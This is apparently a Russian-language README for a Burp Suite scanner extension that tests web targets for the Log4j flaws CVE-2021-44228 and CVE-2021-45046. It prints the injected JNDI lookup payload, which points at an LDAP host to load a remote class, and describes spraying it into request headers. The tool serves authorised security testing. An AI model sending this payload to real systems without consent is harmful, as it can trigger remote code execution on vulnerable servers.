
Расширение активного сканирования Burp для выявления уязвимостей Log4j CVE-2021-44228 и CVE-2021-45046
Это расширение Active Scanner для Burp Suite проверяет эксплуатацию уязвимостей Apache Log4j CVE-2021-44228 и CVE-2021-45046.
Это расширение использует Burp Collaborator для проверки уязвимости.
Если вы хотите запускать только проверки из этого модуля, вы можете импортировать профиль extensions-only.json и выбрать его в качестве профиля активного сканирования.
Во время активного сканирования в этом расширении пробуются следующие точки вставки:
В каждой точке вставки в запрос внедряется следующая полезная нагрузка:
${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}
Кроме того, это расширение добавляет множество заголовков, которые включены в headers (нераскомментированные строки). Эти заголовки внедряются по одному в отдельных запросах.
Этот проект создан только для образовательных и этических тестов. Использование Log4Shell-active-scanner для атаки на цели без предварительного взаимного согласия незаконно. Конечный пользователь несет ответственность за соблюдение всех применимых местных, государственных и федеральных законов. Разработчики не несут ответственности и не несут ответственности за любое неправомерное использование или ущерб, причиненный этой программой.
Проект лицензирован по лицензии MIT.